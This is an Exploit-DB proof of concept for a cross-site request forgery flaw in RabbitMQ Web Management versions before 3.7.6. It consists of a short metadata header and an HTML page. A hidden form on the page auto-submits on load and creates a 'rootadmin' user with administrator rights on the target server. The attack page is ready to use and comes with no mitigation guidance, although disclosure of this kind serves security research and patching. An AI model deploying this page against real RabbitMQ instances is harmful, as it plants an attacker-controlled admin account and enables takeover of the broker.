RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery

EDB-ID: 44902
Author: Dolev Farhi
Published: 2018-06-18
CVE: N/A
Type: Webapps
Platform: Linux
Vulnerable App: N/A 

 # Date: 2018-06-17 
 # Author: Dolev Farhi 
 # Vendor or Software Link: www.rabbitmq.com 
 # Version: 3.7.6 
 # Tested on: Ubuntu 
  
 <html>   
 <h2>Add RabbitMQ Admin</h2> 
  
 <body> 
 <form name="rabbit" id="rabbit" action="http://Target/api/users/rootadmin" method="POST"> 
 <input type="hidden" name="username" value="rootadmin" /> 
 <input type="hidden" name="password" value="rootadmin" /> 
 <input type="hidden" name="tags" value="administrator" /> 
 <input type="submit"  value="save" /> 
 </form> 
  
 <script> 
   window.onload = rabbit.submit() 
 </script> 
  
 </body> 
 </html>

Source: www.exploit-db.com
Related Posts